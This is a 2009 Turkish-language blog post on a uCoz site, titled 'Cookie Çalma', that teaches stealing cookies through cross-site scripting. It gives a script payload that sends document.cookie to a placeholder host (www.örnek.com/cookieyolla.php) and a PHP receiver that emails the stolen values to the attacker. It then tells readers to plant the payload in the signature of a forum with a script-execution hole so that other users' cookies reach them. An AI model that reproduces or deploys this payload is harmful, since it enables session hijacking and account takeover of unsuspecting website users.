Суббота, 27.04.2024, 06:03
Приветствую Вас Гость | RSS
Меню сайта
    Форма входа
    Категории раздела
    Proqramlar [230]
    Sekiller [46]
    Video [120]
    Oyunlar [29]
    Sevgi [17]
    Zengimcell [3]
    Islam [3]
    Sayt Gornusleri [9]
    Mahnilar [104]
    VeB [22]
    Xeberler [16]
    Поиск
    Календарь
    «  Июнь 2009  »
    ПнВтСрЧтПтСбВс
    1234567
    891011121314
    15161718192021
    22232425262728
    2930
    Архив записей
    Наш опрос
    Hansi Bolme Yaxsidir?
    Результаты | Архив опросов
    Всего ответов: 1881
    Друзья сайта
  • Создать сайт
  • Все для веб-мастера
  • Программы для всех
  • Мир развлечений
  • Лучшие сайты Рунета
  • Кулинарные рецепты
    • Статистика
    Hal Hazirda saytda: 1
    Qonaqlar: 1
    İstifadeçiler: 0

    DizayneR.UcoZ.Ru

    Главная Регистрация Вход

    Главная » 2009 » Июнь » 18 » Cookie Çalma
    17:03
    Cookie Çalma
    script>window.navigate("http://www.örnek.com/cookieyolla.php?data="+document.cookie)</script>


    Bu html kodu, kodun mevcut olduğu sayfayı açanların cookie değerlerini cookieyolla.php uzerinden bize yollamaktadır. Cookie yolla.php çok basit bir php kodudur, "data" değerini "cookieyolla.php" üzerinden maille atar "+document.cookie ise cookie yi çalan javascript kodudur. Işin mantığı bu.

    Cookieyolla.php kodu:


    $cookie = $_GET['data'];

    $kime = "nick@mailserverı.com";

    $konu = "cookie";

    mail ($kime,$konu,$cookie);

    ?>



    Not: cookieyolla.php'yi kendiniz değiştirebilirsiniz, yaratıcılığınıza bağlı.

    nick@mailserverı.com yerine cookie değerini yollamasını istediğiniz maili(yani kendi mailinizi yazın)
    Cookie çalma olayı iki şekilde gerçekleştirilebilir.

    Birincisi XSS yani "cross site scripting" dir. Bu yontemle bir web sitesi başka bir sitenin cookie sini okur. Bu yöntemle kurban A sitesine girer ve A sitesindeki script, kurbanın daha once girmiş olduğu B sitesinin cookie sini okur ve depolar. Bu işi yapmanın çeşitli yolları vardır, bu bir açıktır ve açığın bulunmadığı sistemlere etki etmez.

    İkinci yöntem ise forum tarzı bir siteye script inject etmekle olur. forumda kullandığın imza yerine bir script koyuyorsun ve başkaları senin mesajını okurken bu script işletiliyor. Sonuç olarak bu script başkalarının forumdaki cookiesini okuyup sana gonderiyor. Bu yontemin uyg****abilmesi için oncelikle forum sitesinde script işletebileceğin bir açık olması gerekir. Birçok forum sitesinde gerekli korumalar yapılmıştır ve imza yerine koyacağın script site tarafından işletilmeyecektir. Eğer sitede bu açık varsa yukarda yazdığın şeyler işe yarar. www.örnek.com yerine kendi web sitenin adresini yazacaksın. Kendi sitene koyduğun yukarda yazan php sayfası scriptin işletildiği siteden cookie değerini alıp sana mail atacak. ,

    Daha açık anlatmak gerekirse, mesela benim sitem www.örnek.com ben şöyle yapacam:

    www.örnek.com/cokieyolla.php diye bir php sayfası oluşturuyorum sitemde . Bu php sayfasının kodlarını şöyle yapıyorum:


    $cookie = $_GET['data'];

    $kime = "nick@mailserver.com";

    $konu = "cookie";

    mail ($kime,$konu,$cookie);

    ?>


    sitemde php sayfamı hazırladım. Şimdi dandik bir forum sitesine giriyorum. imza kısmında script işletme açığı olduğunu fark ediyorum ve imzama şunu yazıyorum:

    ********>window.navigate("http://www.örnek.com/cookieyolla.php?data="+document.cookie)</script>

    Просмотров: 1480 | Добавил: Angel_Boy | Рейтинг: 0.0/0
    Всего комментариев: 0
    Добавлять комментарии могут только зарегистрированные пользователи.
    [ Регистрация | Вход ]
    Copyright MyCorp © 2024